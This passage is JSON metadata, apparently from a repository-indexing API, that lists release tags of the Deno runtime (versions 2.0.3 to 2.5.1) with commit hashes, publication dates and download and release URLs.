_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"